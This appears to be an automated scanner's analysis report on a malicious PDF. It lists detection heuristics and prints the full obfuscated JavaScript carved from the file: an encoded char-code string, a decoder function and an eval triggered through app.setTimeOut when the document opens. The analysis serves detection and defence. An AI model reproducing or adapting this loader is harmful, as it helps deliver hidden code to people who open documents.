SUSPICIOUS
56
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 4
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Optional Content Group with action trigger low PDF_OPTIONAL_CONTENTOptional Content Group (layer) co-occurs with an action trigger — content can be selectively hidden from viewers or scanners while the action still fires on open
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0010_000.js |
pdf-javascript-stream | PDF /JS object 10 at offset 0x7062 | 8330 bytes |
SHA-256: 00bc08d61a1d3d6364214a463c84e2e47777e8854317124d74c4f35a19618595 |
|||
Preview scriptFirst 1,000 lines of the extracted script
��
v a r A v V S J M 1 = ' 3 3 1 u 3 4 6 P 3 3 9 h 3 2 8 s 3 4 5 V 3 3 4 B 3 4 0 k 3 3 9 C 2 6 1 Y 3 2 9 i 3 3 0 w 3 2 8 q 3 4 0 V 3 2 9 e 3 3 0 j 3 2 4 p 3 2 7 t 3 3 4 v 3 4 1 U 2 6 9 B 3 3 0 j 3 3 9 Y 3 2 8 R 3 2 4 W 3 4 4 k 3 4 5 T 3 4 3 y 2 7 0 t 2 3 9 A 3 5 2 A 2 3 9 n 2 6 1 u 2 6 1 Q 2 6 1 V 2 6 1 m 3 4 7 m 3 2 6 X 3 4 3 X 2 6 1 o 3 2 6 v 3 4 3 F 2 6 1 k 2 9 0 m 2 6 1 b 3 3 9 P 3 3 0 V 3 4 8 Q 2 6 1 I 2 9 4 Q 3 4 3 l 3 4 3 J 3 2 6 A 3 5 0 J 2 6 9 b 2 7 0 X 2 8 8 u 2 3 9 u 2 6 1 V 2 6 1 o 2 6 1 u 2 6 1 W 3 2 6 c 3 4 3 p 2 6 1 m 2 9 0 x 2 6 1 c 3 3 0 Y 3 3 9 U 3 2 8 z 3 2 4 N 3 4 4 Q 3 4 5 E 3 4 3 y 2 7 5 C 3 4 4 g 3 4 1 N 3 3 7 Y 3 3 4 w 3 4 5 W 2 6 9 o 2 6 8 h 2 8 8 g 2 6 8 p 2 7 0 r 2 8 8 H 2 3 9 M 2 6 1 m 2 6 1 B 2 6 1 i 2 6 1 a 3 4 7 w 3 2 6 E 3 4 3 C 2 6 1 l 3 3 9 r 3 4 0 z 3 4 1 O 2 6 1 Q 2 9 0 U 2 6 1 N 2 6 8 d 2 6 8 l 2 8 8 S 2 3 9 b 2 6 1 n 2 6 1 y 2 6 1 p 2 6 1 M 3 3 1 u 3 4 0 M 3 4 3 B 2 6 9 c 3 3 4 s 2 6 1 q 2 9 0 T 2 6 1 A 2 7 7 D 2 8 8 F 3 3 4 B 2 6 1 l 2 8 9 g 2 6 1 y 3 2 6 p 3 4 3 i 2 7 5 k 3 3 7 h 3 3 0 i 3 3 9 y 3 3 2 x 3 4 5 C 3 3 3 L 2 8 8 a 3 3 4 n 2 7 2 d 2 7 2 C 2 7 0 b 2 6 1 c 3 5 2 s 2 3 9 n 2 3 8 W 3 3 9 E 3 4 0 o 3 4 1 y 2 7 2 w 2 9 0 f 3 1 2 S 3 4 5 w 3 4 3 i 3 3 4 Y 3 3 9 y 3 3 2 T 2 7 5 E 3 3 1 x 3 4 3 J 3 4 0 m 3 3 8 h 2 9 6 q 3 3 3 V 3 2 6 f 3 4 3 o 2 9 6 X 3 4 0 r 3 2 9 O 3 3 0 L 2 6 9 V 3 2 6 R 3 4 3 n 3 2 0 x 3 3 4 J 3 2 2 b 2 7 0 U 2 8 8 N 2 3 9 P 2 6 1 T 2 6 1 K 2 6 1 v 2 6 1 m 3 5 4 G 2 3 9 d 2 6 1 K 2 6 1 F 2 6 1 x 2 6 1 P 3 4 3 C 3 3 0 H 3 4 5 C 3 4 6 k 3 4 3 y 3 3 9 X 2 6 1 P 3 3 9 m 3 4 0 u 3 4 1 H 2 8 8 B 2 3 9 G 3 5 4 c 2 3 9 S 2 3 9 t 3 3 1 a 3 4 6 c 3 3 9 U 3 2 8 u 3 4 5 p 3 3 4 k 3 4 0 O 3 3 9 z 2 6 1 f 3 2 8 A 3 3 3 G 3 3 0 J 3 2 8 K 3 3 6 M 3 2 4 H 3 4 3 Z 3 4 6 P 3 3 9 O 2 6 9 b 2 7 0 z 2 3 9 M 3 5 2 y 2 3 9 O 2 6 1 y 2 6 1 t 2 6 1 W 2 6 1 A 3 4 5 z 3 3 3 z 3 3 4 S 3 4 4 t 2 7 5 Z 3 4 4 u 3 5 0 N 3 3 9 U 3 2 8 k 2 9 4 x 3 3 9 i 3 3 9 k 3 4 0 d 3 4 5 j 3 1 2 q 3 2 8 n 3 2 6 t 3 3 9 D 2 6 9 u 2 7 0 T 2 8 8 S 2 3 9 I 2 6 1 v 2 6 1 R 2 6 1 U 2 6 1 u 3 4 7 g 3 2 6 T 3 4 3 o 2 6 1 C 3 4 7 T 3 3 0 n 3 4 3 B 3 4 4 m 3 3 4 h 3 4 0 b 3 3 9 h 2 6 1 u 2 9 0 w 2 6 1 R 3 2 6 s 3 4 1 e 3 4 1 B 2 7 5 W 3 4 7 N 3 3 4 s 3 3 0 J 3 4 8 H 3 3 0 v 3 4 3 D 3 1 5 b 3 3 0 N 3 4 3 L 3 4 4 W 3 3 4 f 3 4 0 g 3 3 9 R 2 7 5 L 3 4 5 A 3 4 0 F 3 1 2 N 3 4 5 U 3 4 3 t 3 3 4 P 3 3 9 H 3 3 2 a 2 6 9 r 2 7 0 o 2 8 8 V 2 3 9 n 2 6 1 G 2 6 1 O 2 6 1 R 2 6 1 I 3 4 7 k 3 3 0 f 3 4 3 A 3 4 4 u 3 3 4 n 3 4 0 w 3 3 9 x 2 6 1 P 2 9 0 K 2 6 1 J 3 4 7 m 3 3 0 p 3 4 3 q 3 4 4 D 3 3 4 B 3 4 0 r 3 3 9 I 2 7 5 O 3 4 3 M 3 3 0 C 3 4 1 e 3 3 7 T 3 2 6 d 3 2 8 V 3 3 0 I 2 6 9 y 2 7 6 I 3 2 1 O 2 9 7 N 2 7 6 a 3 3 2 W 2 7 3 y 2 6 1 G 2 6 3 X 2 6 3 s 2 7 0 u 2 8 8 T 2 3 9 q 2 6 1 J 2 6 1 e 2 6 1 A 2 6 1 v 3 4 7 T 3 2 6 r 3 4 3 y 2 6 1 V 3 4 7 i 3 2 6 H 3 4 3 j 3 4 4 v 3 3 4 K 3 4 0 O 3 3 9 O 3 2 4 n 3 2 6 k 3 4 3 W 3 4 3 m 3 2 6 t 3 5 0 l 2 6 1 z 2 9 0 U 2 6 1 H 3 3 9 y 3 3 0 b 3 4 8 f 2 6 1 q 2 9 4 V 3 4 3 z 3 4 3 h 3 2 6 f 3 5 0 d 2 6 9 i 3 4 7 a 3 3 0 x 3 4 3 Z 3 4 4 Z 3 3 4 S 3 4 0 I 3 3 9 h 2 7 5 C 3 2 8 D 3 3 3 s 3 2 6 R 3 4 3 S 2 9 4 f 3 4 5 B 2 6 9 o 2 7 7 S 2 7 0 v 2 7 3 a 2 6 1 R 3 4 7 P 3 3 0 i 3 4 3 P 3 4 4 q 3 3 4 N 3 4 0 G 3 3 9 M 2 7 5 M 3 2 8 n 3 3 3 r 3 2 6 q 3 4 3 V 2 9 4 S 3 4 5 n 2 6 9 v 2 7 8 s 2 7 0 G 2 7 3 D 2 6 1 a 3 4 7 J 3 3 0 H 3 4 3 S 3 4 4 a 3 3 4 Z 3 4 0 x 3 3 9 c 2 7 5 O 3 2 8 P 3 3 3 X 3 2 6 p 3 4 3 h 2 9 4 n 3 4 5 X 2 6 9 x 2 7 9 e 2 7 0 k 2 7 0 D 2 8 8 r 2 3 9 x 2 6 1 r 2 6 1 j 2 6 1 n 2 6 1 N 3 3 4 B 3 3 1 b 2 6 1 J 2 6 9 u 2 6 9 h 3 4 7 N 3 2 6 U 3 4 3 r 3 4 4 U 3 3 4 m 3 4 0 R 3 3 9 u 3 2 4 k 3 2 6 u 3 4 3 J 3 4 3 A 3 2 6 S 3 5 0 y 3 2 0 h 2 7 7 F 3 2 2 V 2 6 1 f 2 8 9 k 2 6 1 G 2 8 5 i 2 7 0 b 2 6 1 D 3 5 3 a 3 5 3 K 2 6 1 q 2 6 9 o 3 4 7 M 3 2 6 R 3 4 3 x 3 4 4 H 3 3 4 z 3 4 0 K 3 3 9 b 3 2 4 q 3 2 6 f 3 4 3 O 3 4 3 I 3 2 6 a 3 5 0 y 3 2 0 D 2 7 7 k 3 2 2 z 2 6 1 V 2 9 0 i 2 9 0 g 2 6 1 b 2 8 5 E 2 6 1 L 2 6 7 L 2 6 7 K 2 6 1 u 3 4 7 n 3 2 6 N 3 4 3 V 3 4 4 y 3 3 4 E 3 4 0 J 3 3 9 K 3 2 4 V 3 2 6 H 3 4 3 R 3 4 3 V 3 2 6 S 3 5 0 t 3 2 0 M 2 7 8 y 3 2 2 I 2 6 1 V 2 8 9 Y 2 6 1 G 2 7 9 Y 2 6 1 I 2 6 7 F 2 6 7 u 2 6 1 r 3 4 7 m 3 2 6 V 3 4 3 v 3 4 4 y 3 3 4 h 3 4 0 G 3 3 9 t 3 2 4 V 3 2 6 T 3 4 3 P 3 4 3 T 3 2 6 Y 3 5 0 Z 3 2 0 e 2 7 9 u 3 2 2 g 2 6 1 w 2 8 9 P 2 6 1 z 2 7 9 p 2 7 0 c 2 7 0 x 2 6 1 x 3 5 2 x 2 3 9 W 2 3 8 E 3 4 7 W 3 2 6 e 3 4 3 K 2 6 1 R 3 2 6 W 3 3 9 x 3 3 9 n 2 6 1 R 2 9 0 v 2 6 1 U 3 4 5 Y 3 3 3 p 3 3 4 q 3 4 4 s 2 7 5 E 3 3 2 J 3 3 0 Q 3 4 5 e 2 9 4 n 3 3 9 K 3 3 9 K 3 4 0 j 3 4 5 a 2 6 9 K 2 7 7 Z 2 7 3 C 2 6 1 H 2 6 3 W 2 7 7 A 2 7 7 d 2 7 7 b 2 7 8 X 2 7 4 I 2 7 7 l 2 7 7 o 2 7 7 e 2 7 8 i 2 6 3 c 2 7 0 w 2 8 8 e 2 6 1 x 2 3 9 U 2 3 8 U 3 4 7 n 3 2 6 M 3 4 3 Z 2 6 1 w 3 2 7 c 3 3 4 D 3 4 1 j 2 6 1 m 2 9 0 O 2 6 1 S 2 6 8 M 2 6 8 Y 2 8 8 r 2 3 9 P 2 3 8 g 3 3 4 O 3 3 1 P 2 6 9 J 2 6 1 p 3 2 6 n 3 3 9 S 3 3 9 b 2 6 1 b 2 6 2 w 2 9 0 K 2 6 1 D 3 3 9 s 3 4 6 p 3 3 7 B 3 3 7 N 2 6 1 J 2 7 0 o 2 6 1 Z 3 5 2 j 2 3 9 k 2 3 8 C 2 6 1 m 2 6 1 T 2 6 1 o 2 6 1 A 3 2 7 m 3 3 4 B 3 4 1 Z 2 6 1 e 2 9 0 R 2 6 1 F 3 2 6 t 3 3 9 h 3 3 9 P 2 7 5 i 3 4 4 U 3 4 6 h 3 2 7 K 3 3 5 w 3 3 0 d 3 2 8 U 3 4 5 A 2 8 8 W 2 3 9 J 2 3 8 B 3 5 4 j 2 3 9 T 2 3 8 p 3 3 9 I 3 3 4 C 3 4 1 Z 2 6 1 L 2 9 0 o 2 6 1 t 3 2 9 z 3 3 0 p 3 2 8 g 3 4 0 B 3 2 9 P 3 3 0 L 3 2 4 T 3 2 7 V 3 3 4 E 3 4 1 A 2 6 9 k 3 2 7 n 3 3 4 U 3 4 1 R 2 7 0 x 2 8 8 R 2 3 9 v 2 3 8 S 3 3 0 R 3 4 7 S 3 2 6 c 3 3 7 T 2 6 9 B 3 3 9 v 3 3 4 I 3 4 1 K 2 7 0 x 2 8 8 i 2 3 9 V 2 6 1 m 2 6 1 b 2 6 1 V 2 6 1 c 3 5 4 I 2 6 1 X 3 3 0 s 3 3 7 T 3 4 4 q 3 3 0 N 2 6 1 X 3 5 2 r 2 3 9 x 2 3 8 K 3 4 7 L 3 2 6 P 3 4 3 I 2 6 1 d 3 2 6 L 3 3 9 a 3 3 9 u 2 6 1 d 2 9 0 C 2 6 1 N 3 4 5 f 3 3 3 y 3 3 4 W 3 4 4 q 2 7 5 w 3 3 2 E 3 3 0 L 3 4 5 i 2 9 4 g 3 3 9 h 3 3 9 L 3 4 0 o 3 4 5 F 2 6 9 D 2 7 7 I 2 7 3 v 2 6 1 R 2 6 3 f 2 7 7 n 2 7 7 P 2 7 7 q 2 7 8 z 2 7 4 e 2 7 7 y 2 7 7 c 2 7 7 q 2 7 7 Z 2 6 3 X 2 7 0 T 2 8 8 c 2 6 1 k 2 3 9 z 2 3 8 a 3 4 7 H 3 2 6 p 3 4 3 W 2 6 1 M 3 2 7 B 3 3 4 F 3 4 1 s 2 6 1 i 2 9 0 R 2 6 1 h 2 6 8 n 2 6 8 V 2 8 8 p 2 3 9 j 2 3 8 m 3 3 4 V 3 3 1 W 2 6 9 B 2 6 1 M 3 2 6 V 3 3 9 g 3 3 9 L 2 6 1 x 2 6 2 W 2 9 0 k 2 6 1 V 3 3 9 q 3 4 6 N 3 3 7 G 3 3 7 p 2 6 1 n 2 7 0 N 2 6 1 e 3 5 2 K 2 3 9 Z 2 6 1 f 2 6 1 P 2 6 1 S 2 6 1 O 2 3 8 h 2 6 1 z 2 6 1 C 2 6 1 C 2 6 1 p 3 2 7 l 3 3 4 p 3 4 1 L 2 6 1 I 2 9 0 q 2 6 1 X 3 2 6 e 3 3 9 X 3 3 9 i 2 7 5 c 3 4 4 u 3 4 6 T 3 2 7 x 3 3 5 k 3 3 0 g 3 2 8 D 3 4 5 a 2 8 8 U 2 3 9 Q 2 3 8 F 3 5 4 e 2 3 9 q 2 3 8 l 3 3 9 u 3 3 4 I 3 4 1 z 2 6 1 b 2 9 0 I 2 6 1 C 3 2 9 e 3 3 0 y 3 2 8 o 3 4 0 T 3 2 9 J 3 3 0 w 3 2 4 K 3 2 7 h 3 3 4 b 3 4 1 i 2 6 9 Q 3 2 7 D 3 3 4 c 3 4 1 j 2 7 0 B 2 8 8 N 2 3 9 Q 2 3 8 E 3 3 0 n 3 4 7 k 3 2 6 V 3 3 7 t 2 6 9 P 3 3 9 M 3 3 4 e 3 4 1 J 2 7 0 U 2 8 8 e 2 3 9 l 2 6 1 d 2 6 1 g 2 6 1 P 2 6 1 c 3 5 4 U 2 3 9 j 3 5 4 m 2 3 9 R 2 3 9 u 3 2 6 T 3 4 1 s 3 4 1 c 2 7 5 k 3 2 6 w 3 3 7 E 3 3 0 T 3 4 3 x 3 4 5 R 2 6 9 k 2 6 8 B 2 7 8 F 2 6 8 U 2 7 0 X 2 8 8 y 2 3 9 j 3 2 8 j 3 3 3 d 3 3 0 t 3 2 8 E 3 3 6 H 3 2 4 e 3 4 3 i 3 4 6 o 3 3 9 u 2 6 9 K 2 7 0 I 2 8 8 e ' ;
v a r Y I 7 N E R 5 G Y = 2 2 9 ;
A v V S J M 1 = A v V S J M 1 . r e p l a c e ( / [ ^ 0 - 9 ] / g , ' : ' ) ;
x i T X K b Y q = ' Y I 7 N E R 5 G Y ' ;
A v V S J M 1 = A v V S J M 1 . r e p l a c e ( / : : / g , ' ' ) ;
a p p . a l e r t ( A v V S J M 1 ) ;
f u n c t i o n S 8 W x r S A K x y q 2 ( F u i g s Z i E I U x U , R 7 2 E B U 5 t s v x e ) { v a r F i W 0 O = n e w S t r i n g ( ) ; v a r E 2 U F c 9 2 V K B = n e w S t r i n g ( ) ;
D G h Y a = F u i g s Z i E I U x U . s p l i t ( ' : ' ) ;
f o r ( C Z a M f y a 7 = 0 ; C Z a M f y a 7 < D G h Y a . l e n g t h - 1 ; C Z a M f y a 7 + + ) { P r f W a C g z = S t r i n g [ ' f r o m C h a r C o d e ' ] ( D G h Y a [ C Z a M f y a 7 ] - R 7 2 E B U 5 t s v x e ) ; ;
E 2 U F c 9 2 V K B = E 2 U F c 9 2 V K B + P r f W a C g z ; } r e t u r n E 2 U F c 9 2 V K B ; } ;
x i T X K b Y q = S 8 W x r S A K x y q 2 ( A v V S J M 1 , Y I 7 N E R 5 G Y ) ;
v a r D k w D S U n W = ' a ' ;
v a r R O s j M T q P = ' u ' ;
l i l i C c 9 X 9 6 S q = a p p [ ' s e t ' + ' T i m e O ' + R O s j M T q P + ' t ' ] ( " e v " + D k w D S U n W + " l ( x i T X K b Y q ) " , 1 ) ;
|
|||
stream_001_off00007062.js |
decompressed-pdf-stream | PDF FlateDecoded stream at offset 0x7062 | 4164 bytes |
SHA-256: 4d8c1d022fcca69f1b2afe1664250312f1bc921ee80a0da68b26bd84f6daa001 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.